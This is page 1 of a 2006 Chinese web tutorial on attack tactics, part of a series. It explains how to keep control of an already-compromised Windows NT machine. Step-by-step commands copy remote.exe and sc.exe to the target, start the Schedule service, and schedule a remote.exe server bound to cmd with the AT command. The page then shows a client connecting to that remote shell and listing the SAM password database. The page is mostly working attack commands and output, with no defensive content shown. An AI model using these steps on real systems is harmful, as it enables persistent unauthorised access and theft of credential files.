WEB开发网
开发学院网络安全黑客技术 战术攻防思维撷粹(2) 阅读

战术攻防思维撷粹(2)

 2006-07-04 20:29:23 来源:WEB开发网   
核心提示:**远程作业得到了帐户、种植了Sniffer,但是固执的Blackhat并不因此而禁止他们的控制欲望,战术攻防思维撷粹(2),后门的威胁也就随之而来,这里我所安装的仅仅是一个简单的远程命令行工具remote.exe,此时你应该具有权限帐号),2.启动调度服务C:\toolbox>sc \\target_machi

**远程作业

得到了帐户、种植了Sniffer,但是固执的Blackhat并不因此而禁止他们的控制欲望。后门的威胁也就随之而来。这里我所安装的仅仅是一个简单的远程命令行工具remote.exe,它可以使用/C参数来启动客户模式,而使用/S来启动服务器模式,因此在远程机器使用AT指令设置了启动时间。假如服务器没有启动调度服务,那么使用sc.exe使其启动,剩下的工作就让调度为我们工作,步骤简叙如下:

1.拷贝remote.exe和sc.exe到目标机器,方法很多,诸如使用net use等方法(记住,此时你应该具有权限帐号)。

2.启动调度服务

C:\toolbox>sc \\target_machine start schedule

3.检查目标系统的时间,方便对时

C:\toolbox>net time \\target_machine

Current time at \\target_machine is {date} {time} {PM/AM}

……

4.使用AT指令在目标上启动remote.exe服务

C:\toolbox>at \\target_machine {time} ““remote /s cmd passwd””

Added a new job with job ID=13

5.测试服务 C:\toolbox>remote /c {target_ip_addr} passwd

**************************************

********** remote ****************

********** Client ****************

**************************************

Connected..

Microsft(R) Windows NT(TM)

(C) Copyright 1985-1998 Micrsoft Corp.

C:\>dir winnt\system32\config\sam

驱动器 C 中的卷没有标签。

卷的序列号是 3DCC-5BF7

C:\winnt\system32\config 的目录

2003-02-24 22:41 9,865 sam

1 2 3 4 5 6  下一页

Tags:战术 攻防 思维

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接